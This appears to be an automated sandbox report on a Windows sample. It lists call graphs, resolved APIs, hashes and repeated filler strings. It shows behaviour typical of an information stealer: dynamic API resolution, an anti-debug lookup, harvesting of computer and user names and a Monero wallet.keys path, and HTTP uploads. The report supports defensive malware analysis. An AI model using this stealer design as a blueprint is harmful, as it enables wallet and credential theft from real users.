15649->15664 15651 b051cf 15651->15103 15655 b07720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15652->15655 15654 b076b9 15654->15527 15654->15528 15656 b07780 RegCloseKey 15655->15656 15657 b07765 RegQueryValueExA 
15655->15657 15658 b07793 15656->15658 15657->15656 15658->15654 15659->15539 15661 b089f9 GetProcessHeap HeapFree 15660->15661 15662 b08a0c 15660->15662 15661->15662 15662->15577 15663->15577 15665 b0a7a0 lstrcpy 15664->15665 15666 af5119 15665->15666 15667 af47b0 2 API calls 15666->15667 15668 af5125 15667->15668 15824 b08ea0 15668->15824 15670 af5184 15671 af5192 lstrlen 15670->15671 15672 af51a5 15671->15672 15673 b08ea0 4 API calls 15672->15673 15674 af51b6 15673->15674 15675 b0a740 lstrcpy 15674->15675 15676 af51c9 15675->15676 15677 b0a740 lstrcpy 15676->15677 15678 af51d6 15677->15678 15679 b0a740 lstrcpy 15678->15679 15680 af51e3 15679->15680 15681 b0a740 lstrcpy 15680->15681 15682 af51f0 15681->15682 15683 b0a740 lstrcpy 15682->15683 15684 af51fd InternetOpenA StrCmpCA 15683->15684 15685 af522f 15684->15685 15686 af58c4 InternetCloseHandle 15685->15686 15687 b08b60 3 API calls 15685->15687 15693 af58d9 ctype 15686->15693 15688 af524e 15687->15688 15689 b0a920 3 API calls 15688->15689 15690 af5261 15689->15690 15691 b0a8a0 lstrcpy 15690->15691 15692 af526a 15691->15692 15694 b0a9b0 4 API calls 15692->15694 15697 b0a7a0 lstrcpy 15693->15697 15695 af52ab 15694->15695 15696 b0a920 3 API calls 15695->15696 15698 af52b2 15696->15698 15705 af5913 15697->15705 15699 b0a9b0 4 API calls 15698->15699 15700 af52b9 15699->15700 15701 b0a8a0 lstrcpy 15700->15701 15702 af52c2 15701->15702 15703 b0a9b0 4 API calls 15702->15703 15704 af5303 15703->15704 15706 b0a920 3 API calls 15704->15706 15705->15651 15707 af530a 15706->15707 15708 b0a8a0 lstrcpy 15707->15708 15709 af5313 15708->15709 15710 af5329 InternetConnectA 15709->15710 15710->15686 15711 af5359 HttpOpenRequestA 15710->15711 15713 af58b7 InternetCloseHandle 15711->15713 15714 af53b7 15711->15714 15713->15686 15715 b0a9b0 4 API calls 15714->15715 15716 af53cb 15715->15716 15717 b0a8a0 lstrcpy 15716->15717 15718 af53d4 15717->15718 15719 b0a920 3 API calls 15718->15719 15720 af53f2 15719->15720 15721 b0a8a0 
lstrcpy 15720->15721 15722 af53fb 15721->15722 15723 b0a9b0 4 API calls 15722->15723 15724 af541a 15723->15724 15725 b0a8a0 lstrcpy 15724->15725 15726 af5423 15725->15726 15727 b0a9b0 4 API calls 15726->15727 15728 af5444 15727->15728 15729 b0a8a0 lstrcpy 15728->15729 15730 af544d 15729->15730 15731 b0a9b0 4 API calls 15730->15731 15732 af546e 15731->15732 15733 b0a8a0 lstrcpy 15732->15733 15825 b08ead CryptBinaryToStringA 15824->15825 15827 b08ea9 15824->15827 15826 b08ece GetProcessHeap RtlAllocateHeap 15825->15826 15825->15827 15826->15827 15828 b08ef4 ctype 15826->15828 15827->15670 15829 b08f05 CryptBinaryToStringA 15828->15829 15829->15827 15833->15106 16076 af9880 15834->16076 15836 af98e1 15836->15113 15838 b0a740 lstrcpy 15837->15838 16011 b0a740 lstrcpy 16010->16011 16012 b00266 16011->16012 16013 b08de0 2 API calls 16012->16013 16014 b0027b 16013->16014 16015 b0a920 3 API calls 16014->16015 16016 b0028b 16015->16016 16017 b0a8a0 lstrcpy 16016->16017 16018 b00294 16017->16018 16019 b0a9b0 4 API calls 16018->16019 16020 b002b8 16019->16020 16077 af988d 16076->16077 16080 af6fb0 16077->16080 16079 af98ad ctype 16079->15836 16083 af6d40 16080->16083 16084 af6d63 16083->16084 16093 af6d59 16083->16093 16099 af6530 16084->16099 16088 af6dbe 16088->16093 16109 af69b0 16088->16109 16090 af6e2a 16091 af6ee6 VirtualFree 16090->16091 16090->16093 16094 af6ef7 16090->16094 16091->16094 16092 af6f41 16092->16093 16095 b089f0 2 API calls 16092->16095 16093->16079 16094->16092 16096 af6f38 16094->16096 16097 af6f26 FreeLibrary 16094->16097 16095->16093 16098 b089f0 2 API calls 16096->16098 16097->16094 16098->16092 16100 af6542 16099->16100 16102 af6549 16100->16102 16119 b08a10 GetProcessHeap RtlAllocateHeap 16100->16119 16102->16093 16103 af6660 16102->16103 16108 af668f VirtualAlloc 16103->16108 16105 af6730 16106 af673c 16105->16106 16107 af6743 VirtualAlloc 16105->16107 16106->16088 16107->16106 16108->16105 16108->16106 16110 af69c9 16109->16110 16114 af69d5 
16109->16114 16111 af6a09 LoadLibraryA 16110->16111 16110->16114 16112 af6a32 16111->16112 16111->16114 16116 af6ae0 16112->16116 16120 b08a10 GetProcessHeap RtlAllocateHeap 16112->16120 16114->16090 16115 af6ba8 GetProcAddress 16115->16114 16115->16116 16116->16114 16116->16115 16117 b089f0 2 API calls 16117->16116 16118 af6a8b 16118->16114 16118->16117 16119->16102 16120->16118

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 660 b09860-b09874 call b09750 663 b09a93-b09af2 LoadLibraryA * 5 660->663 664 b0987a-b09a8e call b09780 GetProcAddress * 21 660->664 666 b09af4-b09b08 GetProcAddress 663->666 667 b09b0d-b09b14 663->667 664->663 666->667 669 b09b46-b09b4d 667->669 670 b09b16-b09b41 GetProcAddress * 2 667->670 671 b09b68-b09b6f 669->671 672 b09b4f-b09b63 GetProcAddress 669->672 670->669 673 b09b71-b09b84 GetProcAddress 671->673 674 b09b89-b09b90 671->674 672->671 673->674 675 b09bc1-b09bc2 674->675 676 b09b92-b09bbc GetProcAddress * 2 674->676 676->675
                          APIs
                          • GetProcAddress.KERNEL32(76210000,018A1698), ref: 00B098A1
                          • GetProcAddress.KERNEL32(76210000,018A15F0), ref: 00B098BA
                          • GetProcAddress.KERNEL32(76210000,018A14E8), ref: 00B098D2
                          • GetProcAddress.KERNEL32(76210000,018A15D8), ref: 00B098EA
                          • GetProcAddress.KERNEL32(76210000,018A16B0), ref: 00B09903
                          • GetProcAddress.KERNEL32(76210000,018A8C38), ref: 00B0991B
                          • GetProcAddress.KERNEL32(76210000,01895048), ref: 00B09933
                          • GetProcAddress.KERNEL32(76210000,01895068), ref: 00B0994C
                          • GetProcAddress.KERNEL32(76210000,018A16C8), ref: 00B09964
                          • GetProcAddress.KERNEL32(76210000,018A1758), ref: 00B0997C
                          • GetProcAddress.KERNEL32(76210000,018A1650), ref: 00B09995
                          • GetProcAddress.KERNEL32(76210000,018A1608), ref: 00B099AD
                          • GetProcAddress.KERNEL32(76210000,01895248), ref: 00B099C5
                          • GetProcAddress.KERNEL32(76210000,018A15A8), ref: 00B099DE
                          • GetProcAddress.KERNEL32(76210000,018A1560), ref: 00B099F6
                          • GetProcAddress.KERNEL32(76210000,01895088), ref: 00B09A0E
                          • GetProcAddress.KERNEL32(76210000,018A1710), ref: 00B09A27
                          • GetProcAddress.KERNEL32(76210000,018A1578), ref: 00B09A3F
                          • GetProcAddress.KERNEL32(76210000,01894F68), ref: 00B09A57
                          • GetProcAddress.KERNEL32(76210000,018A1530), ref: 00B09A70
                          • GetProcAddress.KERNEL32(76210000,01895208), ref: 00B09A88
                          • LoadLibraryA.KERNEL32(018A1548,?,00B06A00), ref: 00B09A9A
                          • LoadLibraryA.KERNEL32(018A15C0,?,00B06A00), ref: 00B09AAB
                          • LoadLibraryA.KERNEL32(018A17A0,?,00B06A00), ref: 00B09ABD
                          • LoadLibraryA.KERNEL32(018A1620,?,00B06A00), ref: 00B09ACF
                          • LoadLibraryA.KERNEL32(018A1638,?,00B06A00), ref: 00B09AE0
                          • GetProcAddress.KERNEL32(75B30000,018A1668), ref: 00B09B02
                          • GetProcAddress.KERNEL32(751E0000,018A1728), ref: 00B09B23
                          • GetProcAddress.KERNEL32(751E0000,018A1680), ref: 00B09B3B
                          • GetProcAddress.KERNEL32(76910000,018A8DE8), ref: 00B09B5D
                          • GetProcAddress.KERNEL32(75670000,018952A8), ref: 00B09B7E
                          • GetProcAddress.KERNEL32(77310000,018A8BA8), ref: 00B09B9F
                          • GetProcAddress.KERNEL32(77310000,NtQueryInformationProcess), ref: 00B09BB6
                          Strings
                          • NtQueryInformationProcess, xrefs: 00B09BAA
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: NtQueryInformationProcess
                          • API String ID: 2238633743-2781105232
                          • Opcode ID: b525d5dd9b035bbee8c7c650177b8296c98ffb163332f5263fef8e5b8f5258db
                          • Instruction ID: 8ae2ba77d36f321ef0679274d41a7e659e5f99ca65ab7006fca3a319692e3728
                          • Opcode Fuzzy Hash: b525d5dd9b035bbee8c7c650177b8296c98ffb163332f5263fef8e5b8f5258db
                          • Instruction Fuzzy Hash: C2A12AB6704340AFD344EFACED88A663BF9F75C301708851AA689C3364D779A841CB72

                          Control-flow Graph (basic blocks and edges recovered from the graph dump; node -> successors)
                          • 764: af45c0-af4695 RtlAllocateHeap -> 781
                          • 781: af46a0-af46a6 -> 782, 783
                          • 782: af474f-af47a9 VirtualProtect
                          • 783: af46ac-af474a -> 781
                          APIs
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00AF460E
                          • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00AF479C
                          Strings
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AF4617
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AF4662
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AF473F
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AF45E8
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AF45D2
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AF46C2
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AF46AC
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AF46CD
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AF46B7
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AF4765
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AF4657
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AF45DD
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AF45C7
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AF4643
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AF4713
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AF475A
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AF471E
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AF466D
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AF477B
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AF474F
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AF4622
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AF45F3
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AF4678
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AF4638
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AF4770
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AF46D8
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AF462D
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AF4683
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AF4729
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AF4734
                          Similarity
                          • API ID: AllocateHeapProtectVirtual
                          • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                          • API String ID: 1542196881-2218711628
                          • Opcode ID: c83dc9dc944c1df92fdd70778a185d08e1b37407b1311d5184a3d4301360fed6
                          • Instruction ID: 216382ec7d323667c8356f0ebcdea99ad500838a353e3c0e0754db9dfa2a760d
                          • Opcode Fuzzy Hash: c83dc9dc944c1df92fdd70778a185d08e1b37407b1311d5184a3d4301360fed6
                          • Instruction Fuzzy Hash: AA41F3607EB70DABCE74FBA4984EEED77A25F86710FD85088EC4092294CBB055C4C52E

                          Control-flow Graph (basic blocks and edges recovered from the graph dump; node -> successors)
                          • 801: af4880-af4942 call b0a7a0 call af47b0 call b0a740 * 5 InternetOpenA StrCmpCA -> 816, 817
                          • 816: af494b-af494f -> 818, 819
                          • 817: af4944 -> 816
                          • 818: af4ecb-af4ef3 InternetCloseHandle call b0aad0 call af9ac0 -> 829, 830
                          • 819: af4955-af4acd call b08b60 call b0a920 call b0a8a0 call b0a800 * 2 call b0a9b0 call b0a8a0 call b0a800 call b0a9b0 call b0a8a0 call b0a800 call b0a920 call b0a8a0 call b0a800 call b0a9b0 call b0a8a0 call b0a800 call b0a9b0 call b0a8a0 call b0a800 call b0a9b0 call b0a920 call b0a8a0 call b0a800 * 2 InternetConnectA -> 818, 905
                          • 829: af4ef5-af4f2d call b0a820 call b0a9b0 call b0a8a0 call b0a800 -> 830
                          • 830: af4f32-af4fa2 call b08990 * 2 call b0a7a0 call b0a800 * 8
                          • 905: af4ad3-af4ad7 -> 906, 907
                          • 906: af4ad9-af4ae3 -> 908
                          • 907: af4ae5 -> 908
                          • 908: af4aef-af4b22 HttpOpenRequestA -> 909, 910
                          • 909: af4ebe-af4ec5 InternetCloseHandle -> 818
                          • 910: af4b28-af4e28 call b0a9b0 call b0a8a0 call b0a800 call b0a920 call b0a8a0 call b0a800 call b0a9b0 call b0a8a0 call b0a800 call b0a9b0 call b0a8a0 call b0a800 call b0a9b0 call b0a8a0 call b0a800 call b0a9b0 call b0a8a0 call b0a800 call b0a920 call b0a8a0 call b0a800 call b0a9b0 call b0a8a0 call b0a800 call b0a9b0 call b0a8a0 call b0a800 call b0a920 call b0a8a0 call b0a800 call b0a9b0 call b0a8a0 call b0a800 call b0a9b0 call b0a8a0 call b0a800 call b0a9b0 call b0a8a0 call b0a800 call b0a9b0 call b0a8a0 call b0a800 call b0a920 call b0a8a0 call b0a800 call b0a740 call b0a920 * 2 call b0a8a0 call b0a800 * 2 call b0aad0 lstrlen call b0aad0 * 2 lstrlen call b0aad0 HttpSendRequestA -> 1021
                          • 1021: af4e32-af4e5c InternetReadFile -> 1022, 1023
                          • 1022: af4e5e-af4e65 -> 1023, 1024
                          • 1023: af4e67-af4eb9 InternetCloseHandle call b0a800 -> 909
                          • 1024: af4e69-af4ea7 call b0a9b0 call b0a8a0 call b0a800 -> 1021
                          APIs
                            • Part of subcall function 00B0A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B0A7E6
                            • Part of subcall function 00AF47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00AF4839
                            • Part of subcall function 00AF47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00AF4849
                            • Part of subcall function 00B0A740: lstrcpy.KERNEL32(00B10E17,00000000), ref: 00B0A788
                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00AF4915
                          • StrCmpCA.SHLWAPI(?,018AFBE0), ref: 00AF493A
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00AF4ABA
                          • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00B10DDB,00000000,?,?,00000000,?,",00000000,?,018AFCD0), ref: 00AF4DE8
                          • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00AF4E04
                          • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00AF4E18
                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00AF4E49
                          • InternetCloseHandle.WININET(00000000), ref: 00AF4EAD
                          • InternetCloseHandle.WININET(00000000), ref: 00AF4EC5
                          • HttpOpenRequestA.WININET(00000000,018AFBF0,?,018AF500,00000000,00000000,00400100,00000000), ref: 00AF4B15
                            • Part of subcall function 00B0A9B0: lstrlen.KERNEL32(?,018A89C8,?,\Monero\wallet.keys,00B10E17), ref: 00B0A9C5
                            • Part of subcall function 00B0A9B0: lstrcpy.KERNEL32(00000000), ref: 00B0AA04
                            • Part of subcall function 00B0A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B0AA12
                            • Part of subcall function 00B0A8A0: lstrcpy.KERNEL32(?,00B10E17), ref: 00B0A905
                            • Part of subcall function 00B0A920: lstrcpy.KERNEL32(00000000,?), ref: 00B0A972
                            • Part of subcall function 00B0A920: lstrcat.KERNEL32(00000000), ref: 00B0A982
                          • InternetCloseHandle.WININET(00000000), ref: 00AF4ECF
                          Strings
                          Similarity
                          • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                          • String ID: "$"$------$------$------
                          • API String ID: 460715078-2180234286
                          • Opcode ID: a1a8b3f1e11908c1f73529fbc1ee02b4cebbfc15469f9e135cc524260d379f53
                          • Instruction ID: ef2f7745518df92a22dc1186b79ddbe10c005c94baa3f09eced3c3969c8072e7
                          • Opcode Fuzzy Hash: a1a8b3f1e11908c1f73529fbc1ee02b4cebbfc15469f9e135cc524260d379f53
                          • Instruction Fuzzy Hash: F512AA71910318AADB15EB94DD92FEEBBB8AF14300F5085D9B106B20D1EF706F49CB62
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B07910
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00B07917
                          • GetComputerNameA.KERNEL32(?,00000104), ref: 00B0792F
                          Similarity
                          • API ID: Heap$AllocateComputerNameProcess
                          • String ID:
                          • API String ID: 1664310425-0
                          • Opcode ID: 510e42a944ba5cb74a2280f0687e65acb802f93da8f0d479a50dff604011fd7c
                          • Instruction ID: b06dba6283df65accc9f797a1adc5f4253604eb18f1bbd7c4f4714be2e6f3352
                          • Opcode Fuzzy Hash: 510e42a944ba5cb74a2280f0687e65acb802f93da8f0d479a50dff604011fd7c
                          • Instruction Fuzzy Hash: C3011DB1A44209EFC710DF99DD45BAAFBF8FB04B21F10429AFA45E23D0D77469448BA1
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00AF11B7), ref: 00B07880
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00B07887
                          • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00B0789F
                          Similarity
                          • API ID: Heap$AllocateNameProcessUser
                          • String ID:
                          • API String ID: 1296208442-0
                          • Opcode ID: 013bfed2eb1f1c46dd8afa08cdd77e0ff797b5eacc715e6f5d09db83bcfdfa04
                          • Instruction ID: 191bda980c41e6d0a3de3475d550c98db266eff7fd7d766aeaa06307ae4eb328
                          • Opcode Fuzzy Hash: 013bfed2eb1f1c46dd8afa08cdd77e0ff797b5eacc715e6f5d09db83bcfdfa04
                          • Instruction Fuzzy Hash: 53F04FB1E44208ABC700DF99DD49BAEFBB8EB04721F10025AFA05E27C0C7B419048BA1
                          APIs
                          Similarity
                          • API ID: ExitInfoProcessSystem
                          • String ID:
                          • API String ID: 752954902-0
                          • Opcode ID: ab884df28ed3231a6644d002dbd9443a10131646d35f340f975c1098ff17046f
                          • Instruction ID: c59c88f59c108729aeb567d272035c5d7cdf199c61144622fcd69c40bfd23800
                          • Opcode Fuzzy Hash: ab884df28ed3231a6644d002dbd9443a10131646d35f340f975c1098ff17046f
                          • Instruction Fuzzy Hash: 07D05EB4A0030CDBCB00DFE4DC896EDBB78FB08321F000658E905A2340EA315491CAB6

                          Control-flow Graph (basic-block list with address ranges, API calls per block and edges; the rendered graph and its executed/not-executed colouring are not included in this export)
                          control_flow_graph 633 b09c10-b09c1a 634 b09c20-b0a031 GetProcAddress * 43 633->634 635 b0a036-b0a0ca LoadLibraryA * 8 633->635 634->635 636 b0a146-b0a14d 635->636 637 b0a0cc-b0a141 GetProcAddress * 5 635->637 638 b0a153-b0a211 GetProcAddress * 8 636->638 639 b0a216-b0a21d 636->639 637->636 638->639 640 b0a298-b0a29f 639->640 641 b0a21f-b0a293 GetProcAddress * 5 639->641 642 b0a2a5-b0a332 GetProcAddress * 6 640->642 643 b0a337-b0a33e 640->643 641->640 642->643 644 b0a344-b0a41a GetProcAddress * 9 643->644 645 b0a41f-b0a426 643->645 644->645 646 b0a4a2-b0a4a9 645->646 647 b0a428-b0a49d GetProcAddress * 5 645->647 648 b0a4ab-b0a4d7 GetProcAddress * 2 646->648 649 b0a4dc-b0a4e3 646->649 647->646 648->649 650 b0a515-b0a51c 649->650 651 b0a4e5-b0a510 GetProcAddress * 2 649->651 652 b0a612-b0a619 650->652 653 b0a522-b0a60d GetProcAddress * 10 650->653 651->650 654 b0a61b-b0a678 GetProcAddress * 4 652->654 655 b0a67d-b0a684 652->655 653->652 654->655 656 b0a686-b0a699 GetProcAddress 655->656 657 b0a69e-b0a6a5 655->657 656->657 658 b0a6a7-b0a703 GetProcAddress * 4 657->658 659 b0a708-b0a709 657->659 658->659
                          APIs
                          • GetProcAddress.KERNEL32(76210000,01894FE8), ref: 00B09C2D
                          • GetProcAddress.KERNEL32(76210000,01895148), ref: 00B09C45
                          • GetProcAddress.KERNEL32(76210000,018A9028), ref: 00B09C5E
                          • GetProcAddress.KERNEL32(76210000,018A9040), ref: 00B09C76
                          • GetProcAddress.KERNEL32(76210000,018A9058), ref: 00B09C8E
                          • GetProcAddress.KERNEL32(76210000,018ADCA0), ref: 00B09CA7
                          • GetProcAddress.KERNEL32(76210000,0189A720), ref: 00B09CBF
                          • GetProcAddress.KERNEL32(76210000,018ADD30), ref: 00B09CD7
                          • GetProcAddress.KERNEL32(76210000,018ADD00), ref: 00B09CF0
                          • GetProcAddress.KERNEL32(76210000,018ADC88), ref: 00B09D08
                          • GetProcAddress.KERNEL32(76210000,018ADCB8), ref: 00B09D20
                          • GetProcAddress.KERNEL32(76210000,018950E8), ref: 00B09D39
                          • GetProcAddress.KERNEL32(76210000,018951C8), ref: 00B09D51
                          • GetProcAddress.KERNEL32(76210000,01895008), ref: 00B09D69
                          • GetProcAddress.KERNEL32(76210000,01895108), ref: 00B09D82
